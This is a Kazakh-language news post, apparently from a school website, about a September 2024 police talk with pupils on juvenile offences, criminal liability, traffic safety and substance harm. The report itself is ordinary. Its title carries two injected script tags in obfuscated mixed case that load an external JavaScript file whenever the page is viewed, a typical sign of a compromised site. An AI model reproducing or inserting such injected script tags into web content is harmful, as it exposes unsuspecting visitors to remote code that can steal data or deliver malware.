Профилактикалық әңгіме<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
11.09.2024
2024 жылғы 11 қыркүйекте қараусыз қалудың алдын алу жөніндегі шараларды жүзеге асыру мақсатында,
кәмелетке толмағандардың құқық бұзушылықтары,ЖҚЕ және жарақат бойынша полиция қызметкерлерімен кездесу өтті.
Балалармен әңгіме барысында "Кәмелетке толмағандар арасындағы Әкімшілік құқық бұзушылықтар мен қылмыстар", "жасөспірімдер арасындағы балағат сөздердің алдын алу", "салауатты өмір салты, қауіпсіздік", "жарақаттану", "ЖҚЕ"сияқты маңызды тақырыптарды қозғады. Инспектор өз әңгімесінде ұрлық, тонау, бопсалау, дене жарақатын келтіру сияқты қылмыстар жасағаны үшін жауапкершілік мәселелеріне тоқталды. Жасөспірімдерге қай жастан бастап қылмыстық жауапкершілік туындайтыны, қандай да бір құқық бұзушылық жасағаны үшін қандай жазалар қолданылатыны түсіндірілді. Алкоголь, темекі, есірткі заттарын тұтынудың зияны туралы ерекше назар аударылды. Оқушылармен әңгімелесу барысында полиция қызметкері қылмыстың құрбаны болмау туралы айтты: өмір мен денсаулық қауіпсіздігі, сондай-ақ жеке заттардың қауіпсіздігі үшін жауапкершілік мәселелері көтерілді.